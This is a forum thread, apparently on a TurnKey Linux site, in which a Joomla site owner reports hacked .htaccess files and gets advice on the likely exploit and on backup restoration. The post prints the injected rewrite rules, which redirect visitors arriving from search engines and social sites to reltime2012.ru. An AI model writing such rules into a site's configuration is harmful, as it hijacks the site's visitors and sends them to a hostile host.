You are here
All .htaccess files in my Joomla site got hacked by reltime2012.com on July 7th. looks like the hack was using the www-data acccount. I don't recall I've change the password of the www-data user before. Is it a default password for the account? I am using the TKL Joomla 1.5 AIM image.
Thanks,
-Edward
This is how's my .htaccess file looks like now.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ htttp://reltime2012.ru/frunleh?9 [R=301,L]
</IfModule>
RewriteRule ^(.*)$ htttp://reltime2012.ru/frunleh?9 [R=301,L]
By default www-data can't login
So unless you've changed that default most likely it was done by exploiting Joomla itself. Best bet would be to update Joomla manually.
TKLBAM Fixed that for me
I have a client that gets targeted by "ze russians" quite a bit (5 times in 6 years).
Mostly its link farming but lately I have no idea what they are doing, nor do I care.
I can now blow the lot away and return to a known good backup. Takes about 10 minutes and I can even restore to a different continent if I want. The power of Turnkey and TKLBAM!
Chris Musty
Director
Specialised Technologies
Add new comment